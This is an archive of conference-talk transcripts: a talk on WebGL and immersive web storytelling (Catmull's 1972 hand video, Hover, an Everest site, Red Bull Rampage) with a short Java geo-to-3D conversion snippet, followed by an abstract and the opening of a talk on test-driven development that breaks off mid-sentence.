time. And in fact, so he was working on sort of the idea of taking digital recordings, well, of creating digital recordings, actually. It's funny. There were no digital recordings prior to that. So he and a man named Tom Stockham were involved in really, really early digital audio. So that was my dad's master's thesis. His office mate was a guy named Ed Catmull. And Ed had a direct connection with the Utah teapot because he was involved in the graphics department at the University of Utah. Has anybody here heard of Ed Catmull? If you've done a lot of 3D graphics, you have heard of him, because many of the sort of fundamental algorithms that we use in 3D rendering today are named after him, or they're math that he did. He's a really pioneering figure in 3D and mostly known though because he started a company called Pixar. Has anybody here heard of Pixar? So when my dad was, when I was young, so my dad, I guess, finished his master's when I was really young. I was probably two or three years old.
After that, he started, my dad started a company called Soundstream. They were doing digital recording. Ed started, went and worked with George Lucas, did a whole bunch of other things. When I was like 10 years old, my family considered moving to California because Ed had a new startup called Pixar and he wanted my dad to join and my dad just didn't think it was going to take off. So we decided to not do it. I think he made the right decision. But Pixar was pretty successful in spite of my dad's prediction. A couple of years ago, Ed was doing a tour. He was speaking and one of the schools he spoke at was the University of Utah. So he had come back to the University of Utah and my uncle is a professor at the University of Utah. So they ran into each other. My dad passed away a few years ago. So they were, my dad, sorry, my uncle and Ed ran into each other. They were talking about my dad and Ed said, well, you know what, if you want, you should come out and I'll give you a tour of Pixar. And my uncle said, OK, yeah, that sounds great. Let's do it. So I somehow talked myself into that trip also. So my uncle, my wife, myself and a couple of other friends went out to Pixar. And I kind of expected that we'd show up there and Ed Catmull would shake our hands and say, thanks for coming and then kind of send us on our way with an intern. But instead, actually, we spent an hour and a half walking around Pixar with Ed Catmull. So that'd be like touring Apple with Steve Jobs. Like it literally was his, you know, he's the CEO. He's the founder. And it was amazing. My wife cried because it was so emotional to see this man's vision become a reality. It was really, really amazing. But one of the things that happened while we were there is I mentioned that in my dad's belongings, we had this little eight millimeter, like, roll of Super 8 film that was marked "hand video." And Ed immediately knew what it was. It's a video that he and my dad and a man named Fred Parke had worked on. And it was the first, I believe, I literally believe it is the first 3D digital video ever created. And Ed thinks, thought so too. So I told him about it and I said, you know, we really should like figure out a way for people to see this because it's 3D video like Pixar would create, but it was created in 1972. And he said, well, if you want, you can digitize that and you can put it on the internet. So I did it. And this is a little bit of that video. And so my dad did the credits. So that's my dad's software right there. Oh, did it pause? Oh, no. Try it again. There we go. Okay. So the thing that's really remarkable to see about this is not just that this is 40 year old 3D video, but inside of this you can kind of see some of the way that it was produced. By the way, when I put this on the internet, everybody thought it was fake. The main thing I had to do was convince people that it was real. So this is the video. It took two and a half hours to render each frame on a machine that in 1972 cost $400,000. So that was $400,000 in 1972. And they could render one frame in two and a half minutes. So it's crazy to think about what we can do. Now we render 60 frames per second on hardware that costs $30. So then here you can see they were coming up with the math and sort of the basic concepts for how it is that you create 3D. So that's literally a plaster cast of Ed Catmull's hand. And they went through and they drew all of the polygons on it and did the measurements for the vertices. So that's what you're looking at there.
Then they digitized it to create all of the math. And then they would enter those manually into the rendering engine which they had created. So what you're watching here is 3D computing literally being invented. And I kind of think it's amazing to see it. So this little bit of hand video actually went on to be in a feature film. There was a, I can't remember the name of the movie, but there was like a two or three second clip in a movie in like 1977. State of the art special effects. So there it is. That's them moving the vertices. And this was the part that my dad told me Ed was most proud of: the fact that they could like manipulate the hand and make, you know, animate it, make it do something. So then that algorithm for the smooth shading is something that Ed became famous for. And also for founding Pixar. Those are the two things. Okay. We can probably move on then. Okay. So we kind of talked a little bit about the early years and how the first pioneers of technology looked for ways to mimic reality in these sort of emerging technologies. So we thought we'd do the middle years and we'd talk about Windows 95. So who remembers Windows 95? Lines out the door. This was a really big deal at the time. I remember it as sort of the difference between Windows 3.1 and Windows 95. It was exciting times back then. So Windows 95 came with a few extras. It was printed on CD-ROM. There was no digital distribution back then. And there were a few extras on the CD-ROM. One of those was a music video by the band Weezer. Who remembers Weezer? All right. We got some Weezer fans in here. And they had Buddy Holly on there. So I think that music video has probably been seen more times than, well, at least back then it was probably a new record. That was when we had YouTube on CD-ROM. Yeah. Right? Yeah. The other extra that was on the Windows 95 CD was a game called Hover. And Hover was a capture-the-flag game where you would manipulate a hovercraft through a maze and you would race against the computer to see who could capture the flags first. So the intention with Hover was that it was meant to showcase sort of the 3D capabilities of Windows. And actually, let's see. So this is a screenshot of the original version of Hover. And crazy enough, this actually still runs on modern versions of Windows. So you can download the EXE and actually run it, which is just incredible, the commitment to backcompat that they have after so long that it still runs. So in IE 11, Microsoft started supporting WebGL and they were approached by an enthusiastic developer named Dan Church. And Dan had grown up playing Hover. He was sort of born in that time, loved the game, and was so enthusiastic that in his spare time he had reverse engineered the game and done a lot of the work to get it running in WebGL. And Microsoft was really excited about this project and asked us to help make the Hover WebGL version a reality. So it was a really fun project that we worked on. And this is sort of an intro video. That's hilarious. Every time I watch it, I laugh. I think I'm getting my mouth too close. Doesn't care that your boss isn't happy with your neck beard. Doesn't care that your dinner's getting cold. And Destiny definitely doesn't care about the past. If it's victory you want, you're going to have to put in the time and the work. Because Destiny only rewards those who are thirsty. Those who know that as delicious as lasagna might sound right now, it'll always come second to the sweet taste of victory.
As far as Destiny's concerned, you have just one job. Because Hover is back. With brand new 3D graphics, touch gameplay, and multiplayer mode for head to head competition. It's time to take back the crown. It's time to go to work. We were pretty excited about that video because Dan Church, the guy that did the port to WebGL, had told us that he was actually the Hover champion at his school. And so I think, I hope, he was excited about the video and didn't think we were poking fun at him. We're still trying to get some of those trophies because apparently they actually made some of those posters and trophies. They actually shipped one of them to Dan. So he's got his Hover trophy now. He's deserving of it. So Hover was an example of the parallel between the rise of computing technology early on. We saw the same thing happen with Windows 95 where people looked for ways to push the state of the art. So I think in today's world we see the same explosion in the web. We started off early where there were pretty limited capabilities in webpages. We basically had a markup and you could display documents. And then we got JavaScript. You could add a little bit of interactivity to the page. And then came Canvas. We had accelerated 2D graphics. And finally with WebGL, 3D graphics are becoming more pervasive on the web. And so it's a really exciting time to be a developer because we're sort of seeing that same explosion in growth that we saw early on in computer history where things just rapidly got so amazing. We're seeing the same sort of thing happen on the web today. Yeah. In fact, it's kind of an interesting time to be a web developer because things are changing so rapidly that I kind of feel like we've got the same problem that Apple has, where for a while everything that you do was so brand new that people just got excited, but now that the technology, I guess, at least from a visual perspective, is settling down, people's expectations have already been set so high we don't know quite where to go. So I guess when we think about extreme web browsing, one of the things that we've noticed is that if we actually take extreme content, that sometimes brings some of the same excitement. So this last year we had an opportunity to work with a company called Glacierworks. Glacierworks was started by this guy, this man named David Breashears, and David is as extreme an individual as you will meet. He has made a career out of climbing Mount Everest and taking just really stunning photos. So he's kind of a hybrid and he's an adventurer, he's a climber, but he's also a multimedia guy. In fact, I think that he was responsible for the first television broadcast from the top of Mount Everest. He's summited, I think, eight times. Is that right? I think he's summited, he climbed Mount Everest, I think, eight times and reached the summit five times. Okay, so he's summited five times, climbed Everest eight times, and he's been on the mountain dozens of times. So one of the things that he's done recently is he's made it his mission to capture imagery related to climate change on Mount Everest. And it's interesting because if you go back and you look at some of the original photos that Hillary and some of the other early expeditions took, you can see certain levels of snowpack and you can see where the ice levels are.
So he's gone back and he's taken new versions of those photos from exactly the same point at the same time of year and in the same light, and then he allows you to compare them side by side and you can see the dramatic reduction in ice. So we had a chance to help him bring some of the content that he created to life and this is a little promo video about that. Yeah, so this is David sort of explaining the mission of Glacier Works and what they wanted to do. I've got, like, first play is always a little tricky. In 1983 I had climbed Everest for the first time and I was walking out from base camp and there was Sir Edmund Hillary. This huge figure, this hero of mine, I sat down and started talking. I was talking so much about the climb and reaching the summit and he very kindly said to me after maybe an hour, David, someday you'll learn to turn your eyes from the summit and look into the valleys. It took me about 20 years to understand what that very special man had said to me. Now I've set out on a journey to understand this place I care about, this place really where I grew up. This glacier and 35,000 other glaciers like this supply water to about 2.3 billion people and it all starts up here. But after years of photographic research, I wanted to know more about the change I was witnessing. We now have powerful new imaging tools available. Adapting these tools has enabled us to document the upper reaches of the highest and most inaccessible mountains in the world. This is where the glaciers are born. We can also depict with tremendous clarity even the highest slopes of Mount Everest. This is our planet and you do not have to be a mountaineer to be able to gaze at the Himalaya and just feel awestruck. I invite you to join me on a journey of exploration in the hope that you will come to understand this region and to care about these mountains and glaciers as much as I do. So talking with David was a really fun experience for us because it felt like we could take a little bit of a trip to Mount Everest. And David wanted the experience on the site to be very similar to that, where people could feel like they go to the site and actually experience Everest. So we did a few things to make that possible. One of the interesting things about Everest is that oftentimes when you think about summiting Everest, you are thinking about getting to the top of the mountain. And David told us that it was not actually like that at all. Summiting Everest is sort of a one-day trip, like you make it up the mountain and then you try and come back down and hopefully everything goes okay. But there is actually a much longer process to lead up to that point. And along the journey to Mount Everest you have to stop in a series of villages. So part of the site we wanted to do a, maybe you could pull up, Everest. We wanted to do a trek that would take people from the first village which is Lukla and through the series of villages. And each of these villages has interactive content that gives the user a feeling that they have been on that same journey. And it is not like you would actually take one journey through all of these cities. He said oftentimes what they would do is they would go to one of these little cities and then they would go to the next and then go back. And it was part of a process that they had to go through to get acclimatized to the altitude so that they would be able to withstand that once they actually summited the mountain. So the trek is using CSS3D.
This was sort of right before Internet Explorer introduced WebGL. So it's still pretty interactive. You can see that you can rotate the map around. If we go inside one of the cities you can see that we're combining gigapixel imagery that was turned into panoramas where you can zoom in. We also wanted to combine it with storytelling. We didn't want to just drop users off into this panoramic view and have them feel like they don't know where to go. So the idea was to work with a technology that Microsoft Research had created called rich interactive narratives. And the idea is that you can guide users with audio. So if we click the play button it will start giving the audio tour. It will manipulate the panoramic image and sort of guide users through the different villages. But at any point users can stop the tour. They can choose a different area of the panorama. They can zoom in and explore and there's lots of content. So it's sort of finding a balance between sort of a video approach where David's a filmmaker. He's worked on IMAX Everest and other films where you have a set story that you tell users. And the web which provides lots of interactivity. We tried to find a balance between those two competing interests. Everest Base Camp is pretty fun because you can see all of the tents. So if we zoom in really, really close down there you can see like some guys setting up some tents down there. And the image will load up. So that's, it's kind of interesting to see. So you know these are the tents where people are staying at base camp and it's, it gives you some perspective to see how tiny those are relative to you know this massive landscape. It's pretty, are there any mountaineers here? What? We're in Norway guys. What's going on? So about halfway through this project actually we shipped the initial version of Glacier Works of the Everest experience. I introduced WebGL and they thought wouldn't it be neat to try and use the 3D capabilities of the browser to give a more realistic, rich representation of the mountain. So we did that. So if you look at the track it's sort of 2D. It's still rotated in 3D. Give it a little bit of feeling like you're going through the map. But if you compare that to the 3D version there's a pretty big difference. And so there are lots, there are some scenarios like this where 3D really fits well. It's a 3D mountain. It's real. You feel like you can get in there and experience it. You get a sense for what the peaks actually look like, the terrain looks like, that you wouldn't get from a two-dimensional map. So this is an example of a perfect use for 3D. So one final thing that we wanted to quickly show you. If you saw during the intro video they had a helicopter that they flew up into the mountain area and they had attached all of these cameras to the front of it. And it was really interesting. David told us that during the entire helicopter trip the pilot was really hesitant to get higher and closer to the mountain. And David kept on pushing me. He said, get a little bit closer. A little bit closer. And so the pilot was really hesitant. He just didn't want to do it. But they went as far as they could and as close as they could to the mountain. But because they had all of these high resolution cameras on the front of the helicopter they took all that imagery and used computation to sort of merge it into a 3D mesh. And so you saw part of that video at the end and I'll show you a little bit now where they've constructed a flight that is actually rendered in 3D. 
And this is pretty amazing because in the same way that the helicopter could not actually go much further or much closer to the mountain, the 3D model allows you to make any path you want through the mountain. And so some of these paths, David as a filmmaker, wanted to do these cinematic curves where we would get really close to the mountain or fly into these valleys where it's physically not possible because the helicopter would probably crash if it did. So the way they created it is really interesting. They took literally thousands of photos. They take hundreds of photos every minute. Or actually thousands of photos every minute. They had like these nine cameras mounted. And then they had technology that would compare similarities in the photographs and then use those to triangulate essentially where specific points were in the photos. And then from there they could construct a point cloud and then they could use the point cloud to construct a 3D mesh. And then from that they mapped the original photography back onto that mesh. And so this video that they're creating is actually made up of the imagery that they captured as they moved through the mountain. But they have complete control over the actual camera movement, which was important because as Joel was mentioning, when you get up that high there's so little air that it's difficult for the helicopter to first of all be steady. And like Joel mentioned, they actually went up higher than I think they're even allowed to by law because it's so dangerous. But also the helicopter just isn't smooth. So this gives them the ability to create smooth, beautiful transitions through the mountain. Yeah, the first one. Okay. So another sort of extreme project that we did this year was a project for Red Bull. And so Red Bull has an event that they sponsor every year, again in Utah, which is like I mentioned where I'm from. So this event is called the Red Bull Rampage and it is some of the most extreme bicycle riding that you will literally ever see. It's crazy. In fact, we should watch the video and then we'll tell you more about it. See if I can get rid of that first view problem. Okay, so this year's sport has its proving ground. For us, that proving ground has been Utah. Everyone's terrified, I think, when they're heading to the top. This practice is pretty on for giving. The Red Bull Rampage is the scariest event of the year. So Rampage was started in the early 2000s and they did it for a couple of years and then they found that the riders were pushing themselves so hard and it was such extreme terrain that they became worried about the safety of the riders so they actually shut down the event for several years. And then just recently, a couple of years ago, they started it back up and from what we could tell nothing changed. So maybe there's just a lot of demand for extreme riding. We actually won a Webby for this. So we just won a Webby this year and somebody from Red Bull accepted it so we didn't get to make our one minute acceptance speech. We were really proud of the team that helped to produce this. So with this one in particular, you can see that there's another 3D model of a mountain. We actually learned how to do that with Everest. We learned how to take the geological data and turn that into a 3D representation of the mountain. And it turns out that's not a trivial thing to do. There's a fair amount of work in sort of moving between sort of the geo-coordinate space and the 3D coordinate space. 
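That last step, moving between the geo-coordinate space and the 3D coordinate space, is at heart a change of reference frame. What follows is a minimal sketch of the simplest flavor of it, a flat-earth (equirectangular) approximation around a chosen reference point; the class and method names are invented for illustration, and this is not the actual Glacierworks or Red Bull pipeline.

```java
// Convert geographic samples (degrees latitude/longitude, meters elevation)
// into local 3D coordinates in meters around a reference point, using a
// flat-earth approximation that is reasonable over a few kilometers.
public class GeoToLocal {
    private static final double EARTH_RADIUS_M = 6_371_000.0;

    private final double refLatRad;
    private final double refLonRad;
    private final double refElevation;

    public GeoToLocal(double refLatDeg, double refLonDeg, double refElevation) {
        this.refLatRad = Math.toRadians(refLatDeg);
        this.refLonRad = Math.toRadians(refLonDeg);
        this.refElevation = refElevation;
    }

    /** Returns {x east, y up, z south} in meters, a typical right-handed 3D layout. */
    public double[] toLocal(double latDeg, double lonDeg, double elevation) {
        double latRad = Math.toRadians(latDeg);
        double lonRad = Math.toRadians(lonDeg);
        double x = (lonRad - refLonRad) * Math.cos(refLatRad) * EARTH_RADIUS_M; // east
        double y = elevation - refElevation;                                    // up
        double z = -(latRad - refLatRad) * EARTH_RADIUS_M;                      // south (north is negative z)
        return new double[] { x, y, z };
    }
}
```

A real pipeline would also have to account for the map projection and the vertical datum of the source elevation data, which is part of the non-trivial work mentioned above.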
So Red Bull had seen that and they were, because ironically they actually launched an Everest app around the same time that we did. So they launched theirs, we launched ours, and we were actually kind of mad because they had a better marketing team behind theirs. But they saw ours and they were excited about it. So they had this idea that they could use it for Red Bull. And the reason is that Red Bull is what they call freestyle mountain bike riding. And the idea is that the course that you take through the mountain is a part of your score. So it's kind of like gymnastics or something where you actually get scored not just based on your time but also based on the difficulty of what you try to do and sort of the creativity of what you do. And so for enthusiasts of a sport like that, it's important to not just see the ride itself but actually see how the ride takes place on top of the mountain. And they were really interested in a way to represent that on the web. So they had this idea, well maybe we could take GPS data from the riders and combine that with geological data and give people a 3D view over how the riders decide to attack this mountain. So one of the first things that we had to figure out though was where we get the 3D data for this really kind of unique and small area in the desert of southern Utah. And it was funny because it just so happens that one of my best friends growing up was the city planner for the town where this event happened. And so he was able to slide us under the table a little bit of geological data for this. So then from that we constructed this mountain and then we put GPS devices on the riders. Some of them didn't want to do it. There were I think two guys that actually wouldn't do it. In retrospect we wish we would have put about five devices on each of the riders because we didn't get quite enough data. So you can see that the data points that we get for the riders are relatively sparse. But you only get one chance with these guys. They're not going to do the ride again. Sometimes they'd drop off a cliff and you'd see the data point where it would be like this far apart on the mountain. A lot happened in that one second. In fact we did some work to kind of interpolate the data so that we had like a nicer sort of representation of it. But so this series of dots represents where the riders moved on the mountain. And then you can see we've kind of added sort of these markers where something interesting happened. Like a crash or a jump or something exciting. Each of the riders goes the week before the event and they will construct their own line and that's part of the criteria that they're judged on. So it's pretty fun. They have videos of guys out there. They've got their family members and friends out there. They're actually constructing their line. So that was one of the goals. As you can see when we switch between users the different lines that each mountain bike rider chose. This guy is our favorite. Yep. And we should watch his run. Let's watch it. This guy it's seriously insane. Spice on the ridge line. So keep your eyes peeled as he's making his way over towards the canyon gap. A lot of people talk about how Kelly's hair flows but he is one of the largest riders we have on the scene. Makes it almost look like he's riding a BMX when he comes down. So right over that ridge line trying to make his way into his line backside of this line. Nice to be able to get a good camera angle of that as we come down. It's flying through here. 
Skipping over top of it at the landing sections. Oh! Cork hip flip over top of that little left hand. Ridge line hip. Bombing down keeping a lot of flow as he's coming up into this drop. Getting it nice and smooth and up into this next part where he'll just be linking up to one last drop. Clean on the drop. No! Huge backflip! Oh my gosh! He landed a backflip over the 72 foot road gap. He just has to finish this run, an unbelievable 72 foot plus backflip. And a huge backflip on that right hand step down. He needs to hold on. Going a slight bit offline and finishing off with a phenomenal run. Kelly McGarry. So that jump is like 23 meters. It's huge and it's about that far down too. They had actually increased the canyon gap from previous years and some of the riders were a little hesitant to even try it. So the fact that he went over it and did a backflip, everyone was just going crazy. They could not believe it. It was really unbelievable. So after the event, well some of the riders including Kelly had actually been equipped with GoPro cameras. So one of the really amazing things, you may have seen this because this actually got a fair amount of attention on YouTube. One of the things you can do is actually watch this from his perspective. And that is crazy here. Should we watch it? Yep. So this is the same run, the GoPro version. This thing is so crazy. That's sort of the first little mini backflip. I get so nervous. Dude! This is crazy. So I was actually going to do this, but now with GoPro videos on the web, I don't need to. Okay, so how are we doing on time? So the last project that we want to tell you about, and this one is just kind of for fun, is a project called FishGL. This is a project that we just did. The Internet Explorer team, who actually sponsored a lot of these projects, they have this really great program where they realized that they could divert some of their marketing dollars toward just helping people bring really cool stuff to the web, rather than buying ads or whatever. And so they just recently shipped support for WebGL in the most recent version of their browser. And they have, with every sort of significant graphics release in the browser, they have created a fish tank demo, and that's kind of a fun thing that they do internally. So they actually asked us to do their fish tank demo for WebGL. And there's kind of two, well I guess maybe the most remarkable, two remarkable things about what's going on with this. So WebGL, as you know, gives you the ability to put 3D in the browser. And we're, you know, I guess kind of when you look at the big picture, sort of where we've been and where we're going, it's interesting to see that, you know, we started off talking about some of the first 3D video that was created in 1972. You remember I mentioned it took two and a half minutes to render one frame on what would be probably $2 million hardware in today's dollars. And today we just created a fish tank where we're rendering much, much more, I mean it's not super complex 3D, but it's significantly more complex 3D than the hand video was. And we're doing that at 60 frames per second on a multitude of devices, including your phone. And finally Apple just announced this week support for WebGL in iOS. So I think that means that now there's WebGL support not just in every browser, but every major browser, but also on every major device including handheld.
So essentially, you know, all of the major web browsers that you might come into contact with now have the ability, including the one in your pocket, to render at 30 to 60 frames per second the same type of 3D that just 30 years ago took two and a half minutes per frame and $2 million. Now I know that it's fun and it's exciting to kind of congratulate our industry on how quickly things are moving, but it really is amazing when you think about that, to think at how quickly things have changed. And it kind of gives us perspective on how quickly things will be changing. If you want to see this one really quickly we can show you the, this one turned out to be really cute. Not nearly as exciting as watching people jump over 70 foot cliffs, but 23 meter cliffs, sorry guys. You guys probably know more about feet than I know about meters though. See. So this is just a cute tank, or fish tank, but it is kind of fun to see what you can do inside of a browser today. That's Internet Explorer Island back there. So let's manipulate it, rotate around the 3D. So that's the fish tank. We kind of did it as a performance demo I guess so you can add a bunch of fish. Oh look, there's, they're placed randomly and looks like we've, he's a little confused. He's got some issues. We should reduce the number of fish and see if we can help him out. We'll give him a merciful death. Put him out of his misery. One of my favorite features in this one is you can actually adjust the amount of time since the last cleaning. So we wanted to do something to change the graphics a little bit and that was a suggestion that came to us. So anyway. So this one was kind of fun. We did do a mobile specific version just because many of the mobile devices even though they support WebGL have limited memory so we couldn't load the full models and all the textures. The textures are actually pretty big in the full version. So we did sort of a scale back version for mobile and it was pretty incredible to see it. They demoed it at the build conference about a month ago and they had a great phone and it was running 60 frames a second. It was just unbelievable to see sort of a model running in 3D on the phone at 60 frames a second. Incidentally, it's interesting. I have a first version surface tablet which also runs both the desktop and the mobile experience. The phone which was about a year, maybe a year and a half newer actually got a higher frame rate than the surface. And that just tells you how quickly the graphics chips are getting better that a phone is doing better than a tablet even a couple years ago. So it's getting pretty great. All right. So, yes, so the future, I guess the question is what happens now, right? And we get asked this question all the time, like sort of where do we see things going? It's been a really exciting time to be a Web developer and I don't think that's ending by any means. I think that the Web, how many people here are Web developers? A lot of us? Okay. So I think that the Web is, the thing that we get excited about the Web is first of all that it's very, very collaborative. And because it's so collaborative, we kind of benefit from the innovation of an entire industry. For a long time that meant that it moved slowly but that doesn't seem to be the case anymore. We kind of feel like now we are able to sort of capture the collective innovation of the group, so to speak, of the industry, but do so very, very, very quickly. 
And that's the thing that we feel most excited about is kind of the bet that we can take on collaboration and the bet that we can take on the innovation of the group. I don't, in spite of the title of our talk today, we don't exactly know what the future of extreme Web browsing is, but we are very invested in it and very excited about it. And when we take the broader look, look at where we've been and where we're going, I think we have a big reason to expect great things out of this technology that we all love so much. Thank you so much, you guys. If you guys have a minute, we'd love to get your feedback on the way out and if there's any questions, we'll take those too. Any questions? Yeah. Which URL page? Yeah. Which one? The... Oh, the slide. All the URLs? How we should do that? We can post them. Yeah. I'll tell you what, my blog is nerdplusart.com. Nerdplusart.com. Here, I'll type it in so you guys can see it. And I will post... That's something I should do anyway, is I will post all of these up there. Let's see. Great idea. So that was not just a question, but a suggestion and I will follow up on that. Any other questions? So that's it right there. Nerd plus art or... There it is. Nerd plus art. Yeah, any other questions? Thanks guys. All right, member feedback. Thank you so much guys. It was really fun to spend an hour with you this morning. Thanks.
|
Only a handful of people will get to climb Mt. Everest during their lifetime and even fewer will land backflips over 25 meter canyons on a mountain bike. In fact, you probably shouldn't try that. And yet, growing support for WebGL and other immersive web technologies brings more of us closer to that reality than we've ever been before. In this talk, we'll explore the future of interactive storytelling and what it means to some of the world's most passionate explorers. We'll show you how these pioneers are using emerging technologies to bring some of the world's most extreme moments into the living rooms of fans and enthusiasts. Come see how 3D, audio, video, gigapixel photography and compelling new hardware combine to create a brand new kind of narrative.
|
10.5446/50859 (DOI)
|
Hello, hello, hello. I'm going to keep my voice down. Can you hear me all the way up there? Everybody okay up there? Yes, I can see you barely because the light is in my eyes. Good. I'm going to see if I can keep my voice low so that I don't strain it. Imagine that my outstretched arms represent the age of the earth from its formation four and a half billion years ago until now. Where are the dinosaurs? Right there. In my first and second knuckle at the very tip of my long middle finger, that's where the dinosaurs were born, that's where the dinosaurs were destroyed. The dinosaurs are very, very recent. We don't like to think about it that way. We think of the dinosaurs as being ancient, but they were only destroyed 65 million years ago out of an age of four and a half billion years. Here, right where my wrist is, is when life crawled out of the ocean. The history of life on the surface of the planet is only as long as my hand. But where on this scale did life begin in the ocean? The answer to that is here. Over three and a half billion years ago, there was life on this planet. Microscopic life, bacterial life, but life. And we know this because we measure the ages of the rocks using radioactive decay. And we see tiny fossils of bacteria here. And we see the rock structures, the stromatolites that they created. And most important, we see the rust. Because those ancient life forms were autotrophic. They turned sunlight into energy. And they released oxygen. And that oxygen combined with the iron in the sea to create rust. And all during this time, all the way to here, that rusting was occurring. It was only here that finally all the iron in the ocean was consumed by the oxygen. And now oxygen could build up in the atmosphere. Prior to this, there was no free oxygen anywhere in the atmosphere. But this is not what we're supposed to be talking about. I just find it fun. How many of you watch my videos? Lots of you. And you notice that I begin all my videos with a science lecture. I do this because it's fun. I also do it because it's something of a trademark. 20 years ago, 25 years ago, I taught a number of courses in C++. And I would break every hour. And at the end of the hour, I would get everybody to come back in the room. And I noticed that they were all talking to each other. And I could not begin my lecture. And I would try to hush everybody, but they would continue talking. So I stumbled on the idea of lecturing about something interesting, but not part of the curriculum. And I found that people almost immediately stopped talking because they wanted to hear it. So I've been using that technique ever since. Now it's become a trademark, so I do it no matter what. The name of today's talk is Advanced Test Driven Development, the Transformation Priority Premise. For the next hour, I'm going to talk to you about test-driven development and some advanced concepts in this idea. How many of you are test-driven developers? Look at that. Now, of course, it's a self-selecting crowd, but I'd say that was 80% of you. If I'd asked that question five years ago, it would have been a third of you. If I'd asked that question five years ago or seven or eight years ago, it would have been a small smattering of you. Now we have 80%. Now you're attending a course or a talk on advanced test-driven development, so I assume you were attracted to it. Because of that, still, the ratio is impressive. What does it mean? It means that the discipline is gaining ground. 
This controversial discipline introduced to us 14 years ago by Kent Beck has slowly been gaining ground, like a rolling snowball. Wherever I go, more and more people are claiming, at least, to be doing test-driven development. I'm going to test that claim, by the way, by defining it for you. Test-driven development is composed of three laws. The first law is that you are not allowed, by the discipline, to write any production code until you have first written a failing unit test. You cannot write any production code. You have to first write a unit test that fails. Once it fails, then you can write production code. And oh, by the way, not compiling is failing. The second law is you are not allowed to write more of a unit test than is sufficient to fail. As soon as the unit test fails, or fails to compile, you must stop writing it and start writing production code. The third law is the worst of them all. The third law says you are not allowed to write more production code than is sufficient to pass the currently failing test. If you follow these three laws, you will find yourself trapped into a cycle that is 10 seconds long. You write a tiny bit of unit test code, but it won't compile, because the functions you're calling have not yet been written. So you must stop writing the unit test and start writing production code. But you will add just the barest amount of production code, and that will make the unit test compile. You must stop writing production code and go back to the unit test. You will add a little bit more unit test code until it fails. You will add a little bit more production code until that test passes, and you will oscillate back and forth between these two streams of code on a second-by-second basis. Ten seconds around the turn, maybe 20, maybe 30. How many of you are doing test driven development? That's a significantly reduced number. That's the discipline. Now, disciplines. Disciplines are arbitrary. We choose them because we made some decision. So for example, how does a doctor scrub before surgery? In the United States, at least in some hospitals, they teach their doctors to get a brush, soap up the brush, and then do 10 strokes across the side of the finger, then 10 strokes across the top of the finger, 10 strokes on the other side of the finger, 10 strokes across the face of the finger, 10 strokes across the nail, next finger. That's a discipline. It's an arbitrary discipline. Is 10 strokes the right number? Do you have to do the four quadrants? Could you do three quadrants? It's not relevant. It's just a discipline. It's arbitrary. And yet, the doctors teach each other this discipline, and they follow it, and they watch each other in the scrub room. They watch to make sure that they're following the discipline as it was taught to them. How many of you are pilots? Anybody here learn to fly? One of you. Maybe more. I don't know. When you learn to fly, you learn disciplines. One of the most important disciplines is the checklist. Before you do anything, you pull out the checklist, and you make sure that you follow the checklist items. You first get to the airplane. You get the checklist out, and the checklist says, walk around the airplane. Look at the different parts of the airplane. Make sure the airplane is fine. It's a discipline. And you learn this discipline, and your instructor says, start here. Walk around this way. Walk that way. Around the plane. Look at this. Look at that. It's all on the checklist. And he observes. You do it. He watches you.
He's decided that you've learned the discipline. He puts a signature in your log, saying that you are now allowed to do this unsupervised. Those are disciplines. Disciplines invented by professions. Professions that decided they needed disciplines. Does our profession need discipline? Some day, maybe it's already happened, something terrible is going to happen. I don't know when this will happen, but it will. Some poor software guy is going to do some stupid thing. And tens of thousands of people will die. Is this possible? It's absolutely possible. How much software is running around you at the moment? And not in your iPhones, and not in your smartphones, and not in your laptops. How much software is running in the walls of this building? Software that you depend upon for your life. Is there software running in the smoke detectors? Is there software running in the fire alarms? Is there software that controls the opening and locking of the doors? Are there elevators around here? Is there software that controls the elevators? Go out on the road. How much code runs in every car out there? Would you be surprised to find out there's 100 million lines of code in a modern car? A hundred million lines of code in a modern car? That should scare the hell out of you. Because you know what that code is. Most of the world does not. If they did, they would ban the cars. And you know this. Someday something horrible will happen. Tens of thousands of people will die because of a software error. And the politicians of the world will rise up in righteous indignation as they must. And they will point their fingers squarely at us. And they will ask us the question, how could you have let this happen? And our answer must be a good one. Because if we answer by saying, well, my boss made me do it. Or we had to get to market on time. Or I just didn't feel like following any disciplines. If that was our answer, then the politicians of the world will do the only thing that they can do. The only thing they're good at, and even that's questionable. They will legislate. They will pass laws. They will regulate us. They will tell us what languages we can use, what practices we must follow, what books we must read, what tests we must pass, what computers we can operate on. And we will all become civil servants. Don't underestimate this. Our society now depends for its life on us. Software is everywhere. We are the only ones who know what that software is really like. Eventually the rest of the world will find out. They almost found out with the American healthcare system, healthcare.gov, which turned into an incredible disaster, a software disaster of nearly catastrophic measure. Here was a law passed through both houses of the United States Congress, signed into law by the President of the United States, and they could not get the software to execute. It was a terrible disaster. As a result of that, the United States government is now contemplating a new cabinet position reporting directly to the President, the CTO of the United States of America. What would this guy do? Thinking about that scares the hell out of me. Why TDD? I went through the three laws. Now let's talk about what those laws by you. If we adopt a discipline like this, just because we think we ought to be disciplined, then we're stuck in this funny little loop, this 20-second loop. What does that loop buy us? Well, if you're in this 20-second loop or this 10-second loop, it means that 10 seconds ago, everything worked. Everything you were working on. 
You executed, passed all its tests. What would your life be like if 10 seconds ago, or a minute ago, or five minutes ago, everything worked? And I mean, everything worked. How much debugging would you do? The answer to that is, well, you're not going to do a lot of debugging. How many of you are good at the debugger? I mean, you know the debugger. The debugger is your tool. You know how to set breakpoints and watchpoints. You've got all the hotkeys down. I mean, you know how to watch the variables change and get to this breakpoint three times and get to that breakpoint seven times so you can debug. This is not a skill to be desired. You don't want to be good at the debugger. The only way you get good at the debugger is to spend a lot of time debugging. I don't want you spending a lot of time debugging. I want your time to be spent making tests pass. I want your time to be spent writing code that doesn't need to be debugged. Now, you're still going to debug. It is still software. It's still hard. But the amount of time you will spend in the debugger becomes very small. So small that you lose the control that you had. Your fingers don't remember the hotkeys anymore. The debugger becomes a foreign tool. You can still use it. But you don't use it enough. And that's a good thing. But never mind that. What else? How many of you have integrated a third-party package? You buy some third-party package from some source. You get some zip file. You unzip it. In there, there's DLLs. There's maybe some source code. Inevitably, there will be a PDF. That PDF is a manual. That manual is written by some tech writer. And at the back of that manual, there's an ugly appendix with all the code examples. Where's the first place you go? Your programmers. You don't want to read what the tech writer wrote. You go to the code examples first. You look at the code examples. The code examples will tell you the truth. If you're lucky, you can copy and paste those code examples into your application and fiddle them into working. What you are writing when you write unit tests in this tiny little cycle are the code examples for the whole system. You want to know how some part of the system works? There is a test that tells you how that part of the system works. You want to know how to call some API function? There's a test, probably several tests, that tell 